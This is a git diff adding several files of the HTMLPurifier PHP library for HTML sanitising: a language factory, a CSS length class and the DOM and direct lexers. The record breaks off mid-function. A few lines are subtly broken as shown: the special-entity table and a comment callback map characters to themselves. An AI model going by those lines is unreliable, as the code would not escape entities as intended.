a/lib/htmlpurifier/library/HTMLPurifier/LanguageFactory.php b/lib/htmlpurifier/library/HTMLPurifier/LanguageFactory.php new file mode 100644 index 000000000..134ef8c74 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/LanguageFactory.php @@ -0,0 +1,198 @@ +<?php + +/** + * Class responsible for generating HTMLPurifier_Language objects, managing + * caching and fallbacks. + * @note Thanks to MediaWiki for the general logic, although this version + * has been entirely rewritten + * @todo Serialized cache for languages + */ +class HTMLPurifier_LanguageFactory +{ + + /** + * Cache of language code information used to load HTMLPurifier_Language objects + * Structure is: $factory->cache[$language_code][$key] = $value + * @value array map + */ + public $cache; + + /** + * Valid keys in the HTMLPurifier_Language object. Designates which + * variables to slurp out of a message file. + * @value array list + */ + public $keys = array('fallback', 'messages', 'errorNames'); + + /** + * Instance of HTMLPurifier_AttrDef_Lang to validate language codes + * @value object HTMLPurifier_AttrDef_Lang + */ + protected $validator; + + /** + * Cached copy of dirname(__FILE__), directory of current file without + * trailing slash + * @value string filename + */ + protected $dir; + + /** + * Keys whose contents are a hash map and can be merged + * @value array lookup + */ + protected $mergeable_keys_map = array('messages' => true, 'errorNames' => true); + + /** + * Keys whose contents are a list and can be merged + * @value array lookup + */ + protected $mergeable_keys_list = array(); + + /** + * Retrieve sole instance of the factory. + * @param $prototype Optional prototype to overload sole instance with, + * or bool true to reset to default factory. + */ + public static function instance($prototype = null) { + static $instance = null; + if ($prototype !== null) { + $instance = $prototype; + } elseif ($instance === null || $prototype == true) { + $instance = new HTMLPurifier_LanguageFactory(); + $instance->setup(); + } + return $instance; + } + + /** + * Sets up the singleton, much like a constructor + * @note Prevents people from getting this outside of the singleton + */ + public function setup() { + $this->validator = new HTMLPurifier_AttrDef_Lang(); + $this->dir = HTMLPURIFIER_PREFIX . '/HTMLPurifier'; + } + + /** + * Creates a language object, handles class fallbacks + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + * @param $code Code to override configuration with. Private parameter. + */ + public function create($config, $context, $code = false) { + + // validate language code + if ($code === false) { + $code = $this->validator->validate( + $config->get('Core.Language'), $config, $context + ); + } else { + $code = $this->validator->validate($code, $config, $context); + } + if ($code === false) $code = 'en'; // malformed code becomes English + + $pcode = str_replace('-', '_', $code); // make valid PHP classname + static $depth = 0; // recursion protection + + if ($code == 'en') { + $lang = new HTMLPurifier_Language($config, $context); + } else { + $class = 'HTMLPurifier_Language_' . $pcode; + $file = $this->dir . '/Language/classes/' . $code . '.php'; + if (file_exists($file) || class_exists($class, false)) { + $lang = new $class($config, $context); + } else { + // Go fallback + $raw_fallback = $this->getFallbackFor($code); + $fallback = $raw_fallback ? $raw_fallback : 'en'; + $depth++; + $lang = $this->create($config, $context, $fallback); + if (!$raw_fallback) { + $lang->error = true; + } + $depth--; + } + } + + $lang->code = $code; + + return $lang; + + } + + /** + * Returns the fallback language for language + * @note Loads the original language into cache + * @param $code string language code + */ + public function getFallbackFor($code) { + $this->loadLanguage($code); + return $this->cache[$code]['fallback']; + } + + /** + * Loads language into the cache, handles message file and fallbacks + * @param $code string language code + */ + public function loadLanguage($code) { + static $languages_seen = array(); // recursion guard + + // abort if we've already loaded it + if (isset($this->cache[$code])) return; + + // generate filename + $filename = $this->dir . '/Language/messages/' . $code . '.php'; + + // default fallback : may be overwritten by the ensuing include + $fallback = ($code != 'en') ? 'en' : false; + + // load primary localisation + if (!file_exists($filename)) { + // skip the include: will rely solely on fallback + $filename = $this->dir . '/Language/messages/en.php'; + $cache = array(); + } else { + include $filename; + $cache = compact($this->keys); + } + + // load fallback localisation + if (!empty($fallback)) { + + // infinite recursion guard + if (isset($languages_seen[$code])) { + trigger_error('Circular fallback reference in language ' . + $code, E_USER_ERROR); + $fallback = 'en'; + } + $language_seen[$code] = true; + + // load the fallback recursively + $this->loadLanguage($fallback); + $fallback_cache = $this->cache[$fallback]; + + // merge fallback with current language + foreach ( $this->keys as $key ) { + if (isset($cache[$key]) && isset($fallback_cache[$key])) { + if (isset($this->mergeable_keys_map[$key])) { + $cache[$key] = $cache[$key] + $fallback_cache[$key]; + } elseif (isset($this->mergeable_keys_list[$key])) { + $cache[$key] = array_merge( $fallback_cache[$key], $cache[$key] ); + } + } else { + $cache[$key] = $fallback_cache[$key]; + } + } + + } + + // save to cache for later retrieval + $this->cache[$code] = $cache; + + return; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Length.php b/lib/htmlpurifier/library/HTMLPurifier/Length.php new file mode 100644 index 000000000..8d2a46b7d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Length.php @@ -0,0 +1,115 @@ +<?php + +/** + * Represents a measurable length, with a string numeric magnitude + * and a unit. This object is immutable. + */ +class HTMLPurifier_Length +{ + + /** + * String numeric magnitude. + */ + protected $n; + + /** + * String unit. False is permitted if $n = 0. + */ + protected $unit; + + /** + * Whether or not this length is valid. Null if not calculated yet. + */ + protected $isValid; + + /** + * Lookup array of units recognized by CSS 2.1 + */ + protected static $allowedUnits = array( + 'em' => true, 'ex' => true, 'px' => true, 'in' => true, + 'cm' => true, 'mm' => true, 'pt' => true, 'pc' => true + ); + + /** + * @param number $n Magnitude + * @param string $u Unit + */ + public function __construct($n = '0', $u = false) { + $this->n = (string) $n; + $this->unit = $u !== false ? (string) $u : false; + } + + /** + * @param string $s Unit string, like '2em' or '3.4in' + * @warning Does not perform validation. + */ + static public function make($s) { + if ($s instanceof HTMLPurifier_Length) return $s; + $n_length = strspn($s, '1234567890.+-'); + $n = substr($s, 0, $n_length); + $unit = substr($s, $n_length); + if ($unit === '') $unit = false; + return new HTMLPurifier_Length($n, $unit); + } + + /** + * Validates the number and unit. + */ + protected function validate() { + // Special case: + if ($this->n === '+0' || $this->n === '-0') $this->n = '0'; + if ($this->n === '0' && $this->unit === false) return true; + if (!ctype_lower($this->unit)) $this->unit = strtolower($this->unit); + if (!isset(HTMLPurifier_Length::$allowedUnits[$this->unit])) return false; + // Hack: + $def = new HTMLPurifier_AttrDef_CSS_Number(); + $result = $def->validate($this->n, false, false); + if ($result === false) return false; + $this->n = $result; + return true; + } + + /** + * Returns string representation of number. + */ + public function toString() { + if (!$this->isValid()) return false; + return $this->n . $this->unit; + } + + /** + * Retrieves string numeric magnitude. + */ + public function getN() {return $this->n;} + + /** + * Retrieves string unit. + */ + public function getUnit() {return $this->unit;} + + /** + * Returns true if this length unit is valid. + */ + public function isValid() { + if ($this->isValid === null) $this->isValid = $this->validate(); + return $this->isValid; + } + + /** + * Compares two lengths, and returns 1 if greater, -1 if less and 0 if equal. + * @warning If both values are too large or small, this calculation will + * not work properly + */ + public function compareTo($l) { + if ($l === false) return false; + if ($l->unit !== $this->unit) { + $converter = new HTMLPurifier_UnitConverter(); + $l = $converter->convert($l, $this->unit); + if ($l === false) return false; + } + return $this->n - $l->n; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Lexer.php b/lib/htmlpurifier/library/HTMLPurifier/Lexer.php new file mode 100644 index 000000000..9bdbbbb25 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Lexer.php @@ -0,0 +1,326 @@ +<?php + +/** + * Forgivingly lexes HTML (SGML-style) markup into tokens. + * + * A lexer parses a string of SGML-style markup and converts them into + * corresponding tokens. It doesn't check for well-formedness, although its + * internal mechanism may make this automatic (such as the case of + * HTMLPurifier_Lexer_DOMLex). There are several implementations to choose + * from. + * + * A lexer is HTML-oriented: it might work with XML, but it's not + * recommended, as we adhere to a subset of the specification for optimization + * reasons. This might change in the future. Also, most tokenizers are not + * expected to handle DTDs or PIs. + * + * This class should not be directly instantiated, but you may use create() to + * retrieve a default copy of the lexer. Being a supertype, this class + * does not actually define any implementation, but offers commonly used + * convenience functions for subclasses. + * + * @note The unit tests will instantiate this class for testing purposes, as + * many of the utility functions require a class to be instantiated. + * This means that, even though this class is not runnable, it will + * not be declared abstract. + * + * @par + * + * @note + * We use tokens rather than create a DOM representation because DOM would: + * + * @par + * -# Require more processing and memory to create, + * -# Is not streamable, and + * -# Has the entire document structure (html and body not needed). + * + * @par + * However, DOM is helpful in that it makes it easy to move around nodes + * without a lot of lookaheads to see when a tag is closed. This is a + * limitation of the token system and some workarounds would be nice. + */ +class HTMLPurifier_Lexer +{ + + /** + * Whether or not this lexer implements line-number/column-number tracking. + * If it does, set to true. + */ + public $tracksLineNumbers = false; + + // -- STATIC ---------------------------------------------------------- + + /** + * Retrieves or sets the default Lexer as a Prototype Factory. + * + * By default HTMLPurifier_Lexer_DOMLex will be returned. There are + * a few exceptions involving special features that only DirectLex + * implements. + * + * @note The behavior of this class has changed, rather than accepting + * a prototype object, it now accepts a configuration object. + * To specify your own prototype, set %Core.LexerImpl to it. + * This change in behavior de-singletonizes the lexer object. + * + * @param $config Instance of HTMLPurifier_Config + * @return Concrete lexer. + */ + public static function create($config) { + + if (!($config instanceof HTMLPurifier_Config)) { + $lexer = $config; + trigger_error("Passing a prototype to + HTMLPurifier_Lexer::create() is deprecated, please instead + use %Core.LexerImpl", E_USER_WARNING); + } else { + $lexer = $config->get('Core.LexerImpl'); + } + + $needs_tracking = + $config->get('Core.MaintainLineNumbers') || + $config->get('Core.CollectErrors'); + + $inst = null; + if (is_object($lexer)) { + $inst = $lexer; + } else { + + if (is_null($lexer)) { do { + // auto-detection algorithm + + if ($needs_tracking) { + $lexer = 'DirectLex'; + break; + } + + if ( + class_exists('DOMDocument') && + method_exists('DOMDocument', 'loadHTML') && + !extension_loaded('domxml') + ) { + // check for DOM support, because while it's part of the + // core, it can be disabled compile time. Also, the PECL + // domxml extension overrides the default DOM, and is evil + // and nasty and we shan't bother to support it + $lexer = 'DOMLex'; + } else { + $lexer = 'DirectLex'; + } + + } while(0); } // do..while so we can break + + // instantiate recognized string names + switch ($lexer) { + case 'DOMLex': + $inst = new HTMLPurifier_Lexer_DOMLex(); + break; + case 'DirectLex': + $inst = new HTMLPurifier_Lexer_DirectLex(); + break; + case 'PH5P': + $inst = new HTMLPurifier_Lexer_PH5P(); + break; + default: + throw new HTMLPurifier_Exception("Cannot instantiate unrecognized Lexer type " . htmlspecialchars($lexer)); + } + } + + if (!$inst) throw new HTMLPurifier_Exception('No lexer was instantiated'); + + // once PHP DOM implements native line numbers, or we + // hack out something using XSLT, remove this stipulation + if ($needs_tracking && !$inst->tracksLineNumbers) { + throw new HTMLPurifier_Exception('Cannot use lexer that does not support line numbers with Core.MaintainLineNumbers or Core.CollectErrors (use DirectLex instead)'); + } + + return $inst; + + } + + // -- CONVENIENCE MEMBERS --------------------------------------------- + + public function __construct() { + $this->_entity_parser = new HTMLPurifier_EntityParser(); + } + + /** + * Most common entity to raw value conversion table for special entities. + */ + protected $_special_entity2str = + array( + '"' => '"', + '&' => '&', + '<' => '<', + '>' => '>', + ''' => "'", + ''' => "'", + ''' => "'" + ); + + /** + * Parses special entities into the proper characters. + * + * This string will translate escaped versions of the special characters + * into the correct ones. + * + * @warning + * You should be able to treat the output of this function as + * completely parsed, but that's only because all other entities should + * have been handled previously in substituteNonSpecialEntities() + * + * @param $string String character data to be parsed. + * @returns Parsed character data. + */ + public function parseData($string) { + + // following functions require at least one character + if ($string === '') return ''; + + // subtracts amps that cannot possibly be escaped + $num_amp = substr_count($string, '&') - substr_count($string, '& ') - + ($string[strlen($string)-1] === '&' ? 1 : 0); + + if (!$num_amp) return $string; // abort if no entities + $num_esc_amp = substr_count($string, '&'); + $string = strtr($string, $this->_special_entity2str); + + // code duplication for sake of optimization, see above + $num_amp_2 = substr_count($string, '&') - substr_count($string, '& ') - + ($string[strlen($string)-1] === '&' ? 1 : 0); + + if ($num_amp_2 <= $num_esc_amp) return $string; + + // hmm... now we have some uncommon entities. Use the callback. + $string = $this->_entity_parser->substituteSpecialEntities($string); + return $string; + } + + /** + * Lexes an HTML string into tokens. + * + * @param $string String HTML. + * @return HTMLPurifier_Token array representation of HTML. + */ + public function tokenizeHTML($string, $config, $context) { + trigger_error('Call to abstract class', E_USER_ERROR); + } + + /** + * Translates CDATA sections into regular sections (through escaping). + * + * @param $string HTML string to process. + * @returns HTML with CDATA sections escaped. + */ + protected static function escapeCDATA($string) { + return preg_replace_callback( + '/<!\[CDATA\[(.+?)\]\]>/s', + array('HTMLPurifier_Lexer', 'CDATACallback'), + $string + ); + } + + /** + * Special CDATA case that is especially convoluted for <script> + */ + protected static function escapeCommentedCDATA($string) { + return preg_replace_callback( + '#<!--//--><!\[CDATA\[//><!--(.+?)//--><!\]\]>#s', + array('HTMLPurifier_Lexer', 'CDATACallback'), + $string + ); + } + + /** + * Special Internet Explorer conditional comments should be removed. + */ + protected static function removeIEConditional($string) { + return preg_replace( + '#<!--\[if [^>]+\]>.*?<!\[endif\]-->#si', // probably should generalize for all strings + '', + $string + ); + } + + /** + * Callback function for escapeCDATA() that does the work. + * + * @warning Though this is public in order to let the callback happen, + * calling it directly is not recommended. + * @params $matches PCRE matches array, with index 0 the entire match + * and 1 the inside of the CDATA section. + * @returns Escaped internals of the CDATA section. + */ + protected static function CDATACallback($matches) { + // not exactly sure why the character set is needed, but whatever + return htmlspecialchars($matches[1], ENT_COMPAT, 'UTF-8'); + } + + /** + * Takes a piece of HTML and normalizes it by converting entities, fixing + * encoding, extracting bits, and other good stuff. + * @todo Consider making protected + */ + public function normalize($html, $config, $context) { + + // normalize newlines to \n + if ($config->get('Core.NormalizeNewlines')) { + $html = str_replace("\r\n", "\n", $html); + $html = str_replace("\r", "\n", $html); + } + + if ($config->get('HTML.Trusted')) { + // escape convoluted CDATA + $html = $this->escapeCommentedCDATA($html); + } + + // escape CDATA + $html = $this->escapeCDATA($html); + + $html = $this->removeIEConditional($html); + + // extract body from document if applicable + if ($config->get('Core.ConvertDocumentToFragment')) { + $e = false; + if ($config->get('Core.CollectErrors')) { + $e =& $context->get('ErrorCollector'); + } + $new_html = $this->extractBody($html); + if ($e && $new_html != $html) { + $e->send(E_WARNING, 'Lexer: Extracted body'); + } + $html = $new_html; + } + + // expand entities that aren't the big five + $html = $this->_entity_parser->substituteNonSpecialEntities($html); + + // clean into wellformed UTF-8 string for an SGML context: this has + // to be done after entity expansion because the entities sometimes + // represent non-SGML characters (horror, horror!) + $html = HTMLPurifier_Encoder::cleanUTF8($html); + + // if processing instructions are to removed, remove them now + if ($config->get('Core.RemoveProcessingInstructions')) { + $html = preg_replace('#<\?.+?\?>#s', '', $html); + } + + return $html; + } + + /** + * Takes a string of HTML (fragment or document) and returns the content + * @todo Consider making protected + */ + public function extractBody($html) { + $matches = array(); + $result = preg_match('!<body[^>]*>(.*)</body>!is', $html, $matches); + if ($result) { + return $matches[1]; + } else { + return $html; + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Lexer/DOMLex.php b/lib/htmlpurifier/library/HTMLPurifier/Lexer/DOMLex.php new file mode 100644 index 000000000..82f377450 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Lexer/DOMLex.php @@ -0,0 +1,243 @@ +<?php + +/** + * Parser that uses PHP 5's DOM extension (part of the core). + * + * In PHP 5, the DOM XML extension was revamped into DOM and added to the core. + * It gives us a forgiving HTML parser, which we use to transform the HTML + * into a DOM, and then into the tokens. It is blazingly fast (for large + * documents, it performs twenty times faster than + * HTMLPurifier_Lexer_DirectLex,and is the default choice for PHP 5. + * + * @note Any empty elements will have empty tokens associated with them, even if + * this is prohibited by the spec. This is cannot be fixed until the spec + * comes into play. + * + * @note PHP's DOM extension does not actually parse any entities, we use + * our own function to do that. + * + * @warning DOM tends to drop whitespace, which may wreak havoc on indenting. + * If this is a huge problem, due to the fact that HTML is hand + * edited and you are unable to get a parser cache that caches the + * the output of HTML Purifier while keeping the original HTML lying + * around, you may want to run Tidy on the resulting output or use + * HTMLPurifier_DirectLex + */ + +class HTMLPurifier_Lexer_DOMLex extends HTMLPurifier_Lexer +{ + + private $factory; + + public function __construct() { + // setup the factory + parent::__construct(); + $this->factory = new HTMLPurifier_TokenFactory(); + } + + public function tokenizeHTML($html, $config, $context) { + + $html = $this->normalize($html, $config, $context); + + // attempt to armor stray angled brackets that cannot possibly + // form tags and thus are probably being used as emoticons + if ($config->get('Core.AggressivelyFixLt')) { + $char = '[^a-z!\/]'; + $comment = "/<!--(.*?)(-->|\z)/is"; + $html = preg_replace_callback($comment, array($this, 'callbackArmorCommentEntities'), $html); + do { + $old = $html; + $html = preg_replace("/<($char)/i", '<\\1', $html); + } while ($html !== $old); + $html = preg_replace_callback($comment, array($this, 'callbackUndoCommentSubst'), $html); // fix comments + } + + // preprocess html, essential for UTF-8 + $html = $this->wrapHTML($html, $config, $context); + + $doc = new DOMDocument(); + $doc->encoding = 'UTF-8'; // theoretically, the above has this covered + + set_error_handler(array($this, 'muteErrorHandler')); + $doc->loadHTML($html); + restore_error_handler(); + + $tokens = array(); + $this->tokenizeDOM( + $doc->getElementsByTagName('html')->item(0)-> // <html> + getElementsByTagName('body')->item(0)-> // <body> + getElementsByTagName('div')->item(0) // <div> + , $tokens); + return $tokens; + } + + /** + * Iterative function that tokenizes a node, putting it into an accumulator. + * To iterate is human, to recurse divine - L. Peter Deutsch + * @param $node DOMNode to be tokenized. + * @param $tokens Array-list of already tokenized tokens. + * @returns Tokens of node appended to previously passed tokens. + */ + protected function tokenizeDOM($node, &$tokens) { + + $level = 0; + $nodes = array($level => array($node)); + $closingNodes = array(); + do { + while (!empty($nodes[$level])) { + $node = array_shift($nodes[$level]); // FIFO + $collect = $level > 0 ? true : false; + $needEndingTag = $this->createStartNode($node, $tokens, $collect); + if ($needEndingTag) { + $closingNodes[$level][] = $node; + } + if ($node->childNodes && $node->childNodes->length) { + $level++; + $nodes[$level] = array(); + foreach ($node->childNodes as $childNode) { + array_push($nodes[$level], $childNode); + } + } + } + $level--; + if ($level && isset($closingNodes[$level])) { + while($node = array_pop($closingNodes[$level])) { + $this->createEndNode($node, $tokens); + } + } + } while ($level > 0); + } + + /** + * @param $node DOMNode to be tokenized. + * @param $tokens Array-list of already tokenized tokens. + * @param $collect Says whether or start and close are collected, set to + * false at first recursion because it's the implicit DIV + * tag you're dealing with. + * @returns bool if the token needs an endtoken + */ + protected function createStartNode($node, &$tokens, $collect) { + // intercept non element nodes. WE MUST catch all of them, + // but we're not getting the character reference nodes because + // those should have been preprocessed + if ($node->nodeType === XML_TEXT_NODE) { + $tokens[] = $this->factory->createText($node->data); + return false; + } elseif ($node->nodeType === XML_CDATA_SECTION_NODE) { + // undo libxml's special treatment of <script> and <style> tags + $last = end($tokens); + $data = $node->data; + // (note $node->tagname is already normalized) + if ($last instanceof HTMLPurifier_Token_Start && ($last->name == 'script' || $last->name == 'style')) { + $new_data = trim($data); + if (substr($new_data, 0, 4) === '<!--') { + $data = substr($new_data, 4); + if (substr($data, -3) === '-->') { + $data = substr($data, 0, -3); + } else { + // Highly suspicious! Not sure what to do... + } + } + } + $tokens[] = $this->factory->createText($this->parseData($data)); + return false; + } elseif ($node->nodeType === XML_COMMENT_NODE) { + // this is code is only invoked for comments in script/style in versions + // of libxml pre-2.6.28 (regular comments, of course, are still + // handled regularly) + $tokens[] = $this->factory->createComment($node->data); + return false; + } elseif ( + // not-well tested: there may be other nodes we have to grab + $node->nodeType !== XML_ELEMENT_NODE + ) { + return false; + } + + $attr = $node->hasAttributes() ? $this->transformAttrToAssoc($node->attributes) : array(); + + // We still have to make sure that the element actually IS empty + if (!$node->childNodes->length) { + if ($collect) { + $tokens[] = $this->factory->createEmpty($node->tagName, $attr); + } + return false; + } else { + if ($collect) { + $tokens[] = $this->factory->createStart( + $tag_name = $node->tagName, // somehow, it get's dropped + $attr + ); + } + return true; + } + } + + protected function createEndNode($node, &$tokens) { + $tokens[] = $this->factory->createEnd($node->tagName); + } + + + /** + * Converts a DOMNamedNodeMap of DOMAttr objects into an assoc array. + * + * @param $attribute_list DOMNamedNodeMap of DOMAttr objects. + * @returns Associative array of attributes. + */ + protected function transformAttrToAssoc($node_map) { + // NamedNodeMap is documented very well, so we're using undocumented + // features, namely, the fact that it implements Iterator and + // has a ->length attribute + if ($node_map->length === 0) return array(); + $array = array(); + foreach ($node_map as $attr) { + $array[$attr->name] = $attr->value; + } + return $array; + } + + /** + * An error handler that mutes all errors + */ + public function muteErrorHandler($errno, $errstr) {} + + /** + * Callback function for undoing escaping of stray angled brackets + * in comments + */ + public function callbackUndoCommentSubst($matches) { + return '<!--' . strtr($matches[1], array('&'=>'&','<'=>'<')) . $matches[2]; + } + + /** + * Callback function that entity-izes ampersands in comments so that + * callbackUndoCommentSubst doesn't clobber them + */ + public function callbackArmorCommentEntities($matches) { + return '<!--' . str_replace('&', '&', $matches[1]) . $matches[2]; + } + + /** + * Wraps an HTML fragment in the necessary HTML + */ + protected function wrapHTML($html, $config, $context) { + $def = $config->getDefinition('HTML'); + $ret = ''; + + if (!empty($def->doctype->dtdPublic) || !empty($def->doctype->dtdSystem)) { + $ret .= '<!DOCTYPE html '; + if (!empty($def->doctype->dtdPublic)) $ret .= 'PUBLIC "' . $def->doctype->dtdPublic . '" '; + if (!empty($def->doctype->dtdSystem)) $ret .= '"' . $def->doctype->dtdSystem . '" '; + $ret .= '>'; + } + + $ret .= '<html><head>'; + $ret .= '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />'; + // No protection if $html contains a stray </div>! + $ret .= '</head><body><div>'.$html.'</div></body></html>'; + return $ret; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Lexer/DirectLex.php b/lib/htmlpurifier/library/HTMLPurifier/Lexer/DirectLex.php new file mode 100644 index 000000000..456e6e190 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Lexer/DirectLex.php @@ -0,0 +1,490 @@ +<?php + +/** + * Our in-house implementation of a parser. + * + * A pure PHP parser, DirectLex has absolutely no dependencies, making + * it a reasonably good default for PHP4. Written with efficiency in mind, + * it can be four times faster than HTMLPurifier_Lexer_PEARSax3, although it + * pales in comparison to HTMLPurifier_Lexer_DOMLex. + * + * @todo Reread XML spec and document differences. + */ +class HTMLPurifier_Lexer_DirectLex extends HTMLPurifier_Lexer +{ + + public $tracksLineNumbers = true; + + /** + * Whitespace characters for str(c)spn. + */ + protected $_whitespace = "\x20\x09\x0D\x0A"; + + /** + * Callback function for script CDATA fudge + * @param $matches, in form of array(opening tag, contents, closing tag) + */ + protected function scriptCallback($matches) { + return $matches[1] . htmlspecialchars($matches[2], ENT_COMPAT, 'UTF-8') . $matches[3]; + } + + public function tokenizeHTML($html, $config, $context) { + + // special normalization for script tags without any armor + // our "armor" heurstic is a < sign any number of whitespaces after + // the first script tag + if ($config->get('HTML.Trusted')) { + $html = preg_replace_callback('#(<script[^>]*>)(\s*[^<].+?)(</script>)#si', + array($this, 'scriptCallback'), $html); + } + + $html = $this->normalize($html, $config, $context); + + $cursor = 0; // our location in the text + $inside_tag = false; // whether or not we're parsing the inside of a tag + $array = array(); // result array + + // This is also treated to mean maintain *column* numbers too + $maintain_line_numbers = $config->get('Core.MaintainLineNumbers'); + + if ($maintain_line_numbers === null) { + // automatically determine line numbering by checking + // if error collection is on + $maintain_line_numbers = $config->get('Core.CollectErrors'); + } + + if ($maintain_line_numbers) { + $current_line = 1; + $current_col = 0; + $length = strlen($html); + } else { + $current_line = false; + $current_col = false; + $length = false; + } + $context->register('CurrentLine', $current_line); + $context->register('CurrentCol', $current_col); + $nl = "\n"; + // how often to manually recalculate. This will ALWAYS be right, + // but it's pretty wasteful. Set to 0 to turn off + $synchronize_interval = $config->get('Core.DirectLexLineNumberSyncInterval'); + + $e = false; + if ($config->get('Core.CollectErrors')) { + $e =& $context->get('ErrorCollector'); + } + + // for testing synchronization + $loops = 0; + + while(++$loops) { + + // $cursor is either at the start of a token, or inside of + // a tag (i.e. there was a < immediately before it), as indicated + // by $inside_tag + + if ($maintain_line_numbers) { + + // $rcursor, however, is always at the start of a token. + $rcursor = $cursor - (int) $inside_tag; + + // Column number is cheap, so we calculate it every round. + // We're interested at the *end* of the newline string, so + // we need to add strlen($nl) == 1 to $nl_pos before subtracting it + // from our "rcursor" position. + $nl_pos = strrpos($html, $nl, $rcursor - $length); + $current_col = $rcursor - (is_bool($nl_pos) ? 0 : $nl_pos + 1); + + // recalculate lines + if ( + $synchronize_interval && // synchronization is on + $cursor > 0 && // cursor is further than zero + $loops % $synchronize_interval === 0 // time to synchronize! + ) { + $current_line = 1 + $this->substrCount($html, $nl, 0, $cursor); + } + + } + + $position_next_lt = strpos($html, '<', $cursor); + $position_next_gt = strpos($html, '>', $cursor); + + // triggers on "<b>asdf</b>" but not "asdf <b></b>" + // special case to set up context + if ($position_next_lt === $cursor) { + $inside_tag = true; + $cursor++; + } + + if (!$inside_tag && $position_next_lt !== false) { + // We are not inside tag and there still is another tag to parse + $token = new + HTMLPurifier_Token_Text( + $this->parseData( + substr( + $html, $cursor, $position_next_lt - $cursor + ) + ) + ); + if ($maintain_line_numbers) { + $token->rawPosition($current_line, $current_col); + $current_line += $this->substrCount($html, $nl, $cursor, $position_next_lt - $cursor); + } + $array[] = $token; + $cursor = $position_next_lt + 1; + $inside_tag = true; + continue; + } elseif (!$inside_tag) { + // We are not inside tag but there are no more tags + // If we're already at the end, break + if ($cursor === strlen($html)) break; + // Create Text of rest of string + $token = new + HTMLPurifier_Token_Text( + $this->parseData( + substr( + $html, $cursor + ) + ) + ); + if ($maintain_line_numbers) $token->rawPosition($current_line, $current_col); + $array[] = $token; + break; + } elseif ($inside_tag && $position_next_gt !== false) { + // We are in tag and it is well formed + // Grab the internals of the tag + $strlen_segment = $position_next_gt - $cursor; + + if ($strlen_segment < 1) { + // there's nothing to process! + $token = new HTMLPurifier_Token_Text('<'); + $cursor++; + continue; + } + + $segment = substr($html, $cursor, $strlen_segment); + + if ($segment === false) { + // somehow, we attempted to access beyond the end of + // the string, defense-in-depth, reported by Nate Abele + break; + } + + // Check if it's a comment + if ( + substr($segment, 0, 3) === '!--' + ) { + // re-determine segment length, looking for --> + $position_comment_end = strpos($html, '-->', $cursor); + if ($position_comment_end === false) { + // uh oh, we have a comment that extends to + // infinity. Can't be helped: set comment + // end position to end of string + if ($e) $e->send(E_WARNING, 'Lexer: Unclosed comment'); + $position_comment_end = strlen($html); + $end = true; + } else { + $end = false; + } + $strlen_segment = $position_comment_end - $cursor; + $segment = substr($html, $cursor, $strlen_segment); + $token = new + HTMLPurifier_Token_Comment( + substr( + $segment, 3, $strlen_segment - 3 + ) + ); + if ($maintain_line_numbers) { + $token->rawPosition($current_line, $current_col); + $current_line += $this->substrCount($html, $nl, $cursor, $strlen_segment); + } + $array[] = $token; + $cursor = $end ? $position_comment_end : $position_comment_end + 3; + $inside_tag = false; + continue; + } + + // Check if it's an end tag + $is_end_tag = (strpos($segment,'/') === 0); + if ($is_end_tag) { + $type = substr($segment, 1); + $token = new HTMLPurifier_Token_End($type); + if ($maintain_line_numbers) { + $token->rawPosition($current_line, $current_col); + $current_line += $this->substrCount($html, $nl, $cursor, $position_next_gt - $cursor); + } + $array[] = $token; + $inside_tag = false; + $cursor = $position_next_gt + 1; + continue; + } + + // Check leading character is alnum, if not, we may + // have accidently grabbed an emoticon. Translate into + // text and go our merry way + if (!ctype_alpha($segment[0])) { + // XML: $segment[0] !== '_' && $segment[0] !== ':' + if ($e) $e->send(E_NOTICE, 'Lexer: Unescaped lt'); + $token = new HTMLPurifier_Token_Text('<'); + if ($maintain_line_numbers) { + $token->rawPosition($current_line, $current_col); + $current_line += $this->substrCount($html, $nl, $cursor, $position_next_gt - $cursor); + } + $array[] = $token; + $inside_tag = false; + continue; + } + + // Check if it is explicitly self closing, if so, remove + // trailing slash. Remember, we could have a tag like <br>, so + // any later token processing scripts must convert improperly + // classified EmptyTags from StartTags. + $is_self_closing = (strrpos($segment,'/') === $strlen_segment-1); + if ($is_self_closing) { + $strlen_segment--; + $segment = substr($segment, 0, $strlen_segment); + } + + // Check if there are any attributes + $position_first_space = strcspn($segment, $this->_whitespace); + + if ($position_first_space >= $strlen_segment) { + if ($is_self_closing) { + $token = new HTMLPurifier_Token_Empty($segment); + } else { + $token = new HTMLPurifier_Token_Start($segment); + } + if ($maintain_line_numbers) { + $token->rawPosition($current_line, $current_col); + $current_line += $this->substrCount($html, $nl, $cursor, $position_next_gt - $cursor); + } + $array[] = $token; + $inside_tag = false; + $cursor = $position_next_gt + 1; + continue; + } + + // Grab out all the data + $type = substr($segment, 0, $position_first_space); + $attribute_string = + trim( + substr( + $segment, $position_first_space + ) + ); + if ($attribute_string) { + $attr = $this->parseAttributeString( + $attribute_string + , $config, $context + ); + } else { + $attr = array(); + } + + if ($is_self_closing) { + $token = new HTMLPurifier_Token_Empty($type, $attr); + } else { + $token = new HTMLPurifier_Token_Start($type, $attr); + } + if ($maintain_line_numbers) { + $token->rawPosition($current_line, $current_col); + $current_line += $this->substrCount($html, $nl, $cursor, $position_next_gt - $cursor); + } + $array[] = $token; + $cursor = $position_next_gt + 1; + $inside_tag = false; + continue; + } else { + // inside tag, but there's no ending > sign + if ($e) $e->send(E_WARNING, 'Lexer: Missing gt'); + $token = new + HTMLPurifier_Token_Text( + '<' . + $this->parseData( + substr($html, $cursor) + ) + ); + if ($maintain_line_numbers) $token->rawPosition($current_line, $current_col); + // no cursor scroll? Hmm... + $array[] = $token; + break; + } + break; + } + + $context->destroy('CurrentLine'); + $context->destroy('CurrentCol'); + return $array; + } + + /** + * PHP 5.0.x compatible substr_count that implements offset and length + */ + protected function substrCount($haystack, $needle, $offset, $length) { + static $oldVersion; + if ($oldVersion === null) { + $oldVersion = version_compare(PHP_VERSION, '5.1', '<'); + } 